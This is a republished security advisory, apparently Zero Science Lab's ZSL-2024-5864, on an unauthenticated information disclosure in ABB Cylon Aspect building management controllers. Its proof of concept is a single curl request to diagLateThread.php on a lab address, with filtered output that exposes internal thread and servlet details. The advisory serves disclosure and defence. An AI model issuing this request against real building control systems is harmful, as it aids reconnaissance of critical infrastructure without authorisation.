Vulners
Lucene search
ABB Cylon Aspect 3.08.01 diagLateThread.php Information Disclosure
ποΈΒ 02 Dec 2024Β 00:00:00Reported byΒ LiquidWorm, zeroscience.mkTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 233Β Views
`
ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various protocol thread information running on the device.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5864
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5864.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
ββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββ ββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββ ββββββββββββ
$ curl -s http://192.168.73.31/diagLateThread.php | findstr /spina:d "Summary Thread"
7: <title>Thread Class Status</title>
47: #ProjectThreadStatus {
127: var url ='//192.168.73.31/jsonProxy.php?port=7226&application=StatusServlet&query=showTimerThreadPoolStatus%3Dtrue%26descending%3Dtrue%26responseFormat%3Djson';
128: var directUrl ='//192.168.73.31:7226/servlets/StatusServlet?showTimerThreadPoolStatus=true&descending=true&responseFormat=json';
203: $.getJSON(url, processThreadInfo);
204: //$.getJSON(directUrl, processThreadInfo);
248: //infoText = "<div><h2 class='summaryHeading'>"+targetClass+" Class Summary</h2></div><div class='hideable'><div class='summaryInfo'></div>
306: function processThreadInfo(json) {
308: getClassStats(json, PUP_STR, pupLateTime, "PUPLateTable", "pupSummary");
309: getClassStats(json, BACNET_STR, bacnetLateTime, "BACnetLateTable", "bacnetSummary");
310: getClassStats(json, SDP_STR, sdpLateTime, "SDPLateTable", "sdpSummary");
311: getClassStats(json, SCHEDULE_STR, scheduleLateTime, "ScheduleLateTable", "scheduleSummary");
312: getClassStats(json, DEFAULT_STR, defaultLateTime, "DefaultLateTable", "defaultSummary");
315: $("#ProjectThreadStatus").empty();
316: $("#ProjectThreadStatus").append("<div class='ThreadDiv'><h2>Thread Status at " + systemTime.toTimeString() + "</h2></div>");
317: $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Timers: " + json.totalTimers + "</div>");
318: $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Targets: " + json.totalTargets + "</div>");
323: var warningTime = (timebase * 1000) * threadWarnPercent;
324: var errorTime = (timebase * 1000) * threadErrorPercent;
534: <div id="ProjectThreadStatus"></div>
537: <div class='infoSection ThreadDiv' id="bacnetInfo">
538: <div id="bacnetHeading"><h2>BACnet Summary</h2>
541: <div id="bacnetSummary"></div>
550: <div class='infoSection ThreadDiv' id="pupInfo">
551: <div id="pupHeading"><h2>PUP Summary</h2>
554: <div id="pupSummary"></div>
563: <div class='infoSection ThreadDiv' id="sdpInfo">
564: <div id="sdpHeading"><h2>SDP Summary</h2>
567: <div id="sdpSummary"></div>
576: <div class='infoSection ThreadDiv' id="scheduleInfo">
577: <div id="scheduleHeading"><h2>Schedule Summary</h2>
580: <div id="scheduleSummary"></div>
589: <div class='infoSection ThreadDiv' id="defaultInfo">
590: <div id="defaultHeading"><h2>Default Summary</h2>
593: <div id="defaultSummary"></div>
`
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2024 00:00Current
7.4High risk
Vulners AI Score7.4